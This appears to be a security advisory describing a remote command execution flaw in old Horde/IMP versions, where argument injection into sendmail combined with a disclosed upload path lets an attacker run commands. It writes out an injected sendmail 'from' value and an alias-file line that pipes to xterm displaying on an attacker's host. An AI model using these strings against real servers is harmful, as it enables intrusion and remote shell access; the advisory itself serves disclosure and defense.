Title: Horde IMP Remote Command Execution via Sendmail Vulnerability
Severity: MODERATE
Description:
IMP is a powerful web-based mail interface/client that is developed by the members of the Horde project. Bugtraq ID 1674 detailed a vulnerability in IMP that allowed a malicious user to execute arbitrary commands on the victim host due to certain user input not being validated. The problem was partially corrected in versions 2.2.1 of IMP and 1.2.1 of Horde as checks were added to ensure that shell metacharacters were escaped.
Unfortunately, it is still possible to execute commands on a webserver running vulnerable versions (including 1.2.1/2.2.1) of Horde/IMP due to the use of sendmail and the disclosure of file information by IMP. The problem begins where the patch left off, the passing of user input to popen(). The popen call is used to execute sendmail, the command-line mail transfer program. The PHP script, while escaping shell metacharacters, does not check to ensure that data which could be interpreted as arguments to "sendmail" are passed. As a result, it is possible to specify extra command line options to sendmail by appending them to the FROM variable. This is the first part of the vulnerability.
The other characteristic of IMP that makes remote command execution possible has to do with the way attachments are handled. After an attachment is uploaded, a hidden form variable is set in the "compose" message window that stores the location of the temporary file on the webserver running IMP (the filename usually begins with "php" and is located in /tmp). As a result, an attacker can create on his or her local system a file that looks like this:
"evil@localhost: "|/usr/X11R6/bin/xterm -display attackers-ip:0.0"
and upload it to the remote system as an attachment knowing, after, exactly where it is on the filesystem. This is a sendmail alias file that will execute xterm and send it to a remote display when mail is sent to evil@localhost.
Of course, this alias file isn't really useful for the attacker unless it is actually used by sendmail.
Locally, sendmail allows the user running it to specify configuration paramaters with commandline arguments. Thus, it is possible to submit a "from" variable that looks like this, "x@x -O QueueDirectory=/tmp -O AliasFile=path-of-attachment -Fx". This will cause sendmail, when executed by the PHP script, to run with its queue directory as /tmp and the alias file as whatever was uploaded as a file attachment.
The attacker can then, after uploading the alias-file, getting its location from the html source and setting the "from" field to the malicious parameter string, set the "To" field to evil@localhost and submit the form. An xterm will be sent to the destination specified in the malicious paramater from string upon sendmail seeing who the message is intended for.
This rather clever "combination" method of exploitation is a good example of how file disclosure bugs can assist attackers in exploiting more complex and serious vulnerabilities.
Affected Products:
- Horde Horde 1.2.0
- Horde Horde 1.2.1
- Horde IMP 2.0.0
- Horde IMP 2.2.0
- Horde IMP 2.2.1
References:
- Horde.org: IMP Homepage
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
